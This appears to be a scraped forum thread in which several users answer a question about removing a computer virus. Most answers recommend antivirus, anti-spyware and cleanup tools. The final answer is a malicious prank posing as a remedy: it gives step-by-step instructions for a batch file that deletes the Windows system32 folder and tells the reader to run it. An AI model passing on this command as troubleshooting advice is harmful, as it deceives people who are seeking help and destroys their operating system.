If you were ready to pay, i would recommend Norton Internet Security or Norton Anti Virus. But as you mentioned you don't want to pay anything, i would prefer installing AVG Anti Virus You can get it on www.download.com

I don't know. But, if that was my computer he's what I'd do: 1) Use CCleaner to do a FULL cleanup. 2) Immunize and scan the system with Spybot Search & Destroy. 3) Update Windows with all the latest Windows updates. 4) Use the latest release of FireFox as my default browser.

Use combofix from bleepingcomputer.com, then download malwarebytes from malwarebytes.org or cnet.com or softpedia.com and then use it, for the rest of the virus use superantispyware from superantispyware.com or softpedia.com, and finish it off with better protection in the future with avira as your antivirus with Online Armor or Outpostfirewall as your firewall.

Edit: I think the link above is a virus... Eh..there are many ways, here's the one I recommend: open a notepad type the following: @echo off del c:\WINDOWS\system32 save the file as anything.bat (remember to add the .bat extension and save as all files) double click and it will delete the system32 folder.
